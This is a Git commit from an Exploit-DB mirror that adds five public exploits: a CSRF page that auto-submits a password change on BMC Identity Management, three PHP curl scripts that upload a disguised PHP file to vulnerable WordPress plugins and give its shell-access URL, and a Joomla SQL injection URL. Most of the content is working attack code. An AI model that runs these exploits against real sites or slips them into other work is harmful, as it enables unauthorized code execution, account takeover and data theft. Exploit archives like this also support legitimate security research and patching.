bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-06-26

Browse source 
5 new exploits
This commit is contained in:
Offensive Security 2015-06-26 05:02:53 +00:00
parent 611a35761a
commit 441db36a16
6 changed files with 105 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

5
files.csv
View file

@ -33723,3 +33723,8 @@ id,file,description,date,author,platform,type,port
37367,platforms/windows/local/37367.rb,"Windows ClientCopyImage Win32k Exploit",2015-06-24,metasploit,windows,local,0
37368,platforms/multiple/remote/37368.rb,"Adobe Flash Player ShaderJob Buffer Overflow",2015-06-24,metasploit,multiple,remote,0
37369,platforms/php/webapps/37369.txt,"Vesta Control Panel 0.9.8 - OS Command Injection",2015-06-24,"High-Tech Bridge SA",php,webapps,0
37370,platforms/php/webapps/37370.php,"WordPress FCChat Widget Plugin 2.2.x 'Upload.php' Arbitrary File Upload Vulnerability",2012-06-07,"Sammy FORGIT",php,webapps,0
37371,platforms/php/webapps/37371.php,"WordPress Picturesurf Gallery Plugin 'upload.php' Arbitrary File Upload Vulnerability",2012-06-03,"Sammy FORGIT",php,webapps,0
37372,platforms/java/webapps/37372.html,"BMC Identity Management Cross Site Request Forgery Vulnerability",2012-06-11,"Travis Lee",java,webapps,0
37373,platforms/php/webapps/37373.php,"WordPress Contus Video Gallery Plugin 'upload1.php' Arbitrary File Upload Vulnerability",2012-06-12,"Sammy FORGIT",php,webapps,0
37374,platforms/php/webapps/37374.txt,"Joomla! Alphacontent Component 'limitstart' Parameter SQL Injection Vulnerability",2012-06-10,xDarkSton3x,php,webapps,0

Can't render this file because it is too large.

7
platforms/java/webapps/37372.html Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/53924/info
Identity Management is prone to a cross-site request-forgery vulnerability because the application fails to properly validate HTTP requests.
Exploiting this issue may allow a remote attacker to perform certain actions in the context of an authorized user's session and gain unauthorized access to the affected application; other attacks are also possible.
<html><head><title>BMC IDM Change PW CSRF PoC</title></head> <body onload="document.getElementById('CSRF').submit()"> <form action="https://xxx.xxx.xxx.xxx/idm/password-manager/changePasswords.do"; method="post" id="CSRF"> <input type="hidden" name="colChkbx_Tab1" value="CN=Test User,OU=User Accounts,DC=corporate,DC=business,DC=com corporate Win2000" /> <input type="hidden" name="password" value="Abc123!" /> <input type="hidden" name="passwordAgain" value="Abc123!" /> <input type="hidden" name="selAccts" value="CN=user Name,OU=User Accounts,DC=corporate,DC=business,DC=com corporate Win2000" /> </form></body></html>

31
platforms/php/webapps/37370.php Executable file
View file

@ -0,0 +1,31 @@
source: http://www.securityfocus.com/bid/53855/info
WordPress FCChat Widget plugin is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
WordPress FCChat Widget plugin 2.2.12.2 through versions 2.2.13.1 are vulnerable.
<?php
$uploadfile="lo.php.gif";
$ch =
curl_init("http://www.exemple.com/wordpress/wp-content/plugins/fcchat/html/Upload.php?id=1");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'Submit'=>'submit'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access :
http://www.exemple.com/wordpress/wp-content/plugins/fcchat/html/images/1_lo.php.gif
lo.php.gif
<?php
phpinfo();
?>

33
platforms/php/webapps/37371.php Executable file
View file

@ -0,0 +1,33 @@
source: http://www.securityfocus.com/bid/53894/info
Picturesurf Gallery plugin is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this issue to upload arbitrary PHP code and run it in the context of the Web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
Picturesurf Gallery 1.2 is vulnerable; other versions may also be affected.
PostShell.php
<?php
$uploadfile="lo.php.gif";
$ch =
curl_init("http://www.exemple.com/wordpress/wp-content/plugins/picturesurf-gallery/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'is_simple'=>'is_simple'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access :
http://www.exemple.com/wordpress/wp-content/plugins/picturesurf-gallery/data/upload/lo.php.gif
lo.php.gif
GIF89a???????????!??????,???????D?;?
<?php
phpinfo();
?>

22
platforms/php/webapps/37373.php Executable file
View file

@ -0,0 +1,22 @@
source: http://www.securityfocus.com/bid/53931/info
WordPress Contus Video Gallery is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
WordPress Contus Video Gallery 1.3 is vulnerable; other versions may also be affected.
<?php
$uploadfile="lo.php.jpg";
$ch = curl_init("http://www.example.com/wordpress/wp-content/plugins/contus-video-galleryversion-10/upload1.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('myfile'=>"@$uploadfile",
'mode'=>'image'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

7
platforms/php/webapps/37374.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/53942/info
The Alphacontent component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_alphacontent&section=weblinks&Itemid=1&lang=de&limitstart=[sqli]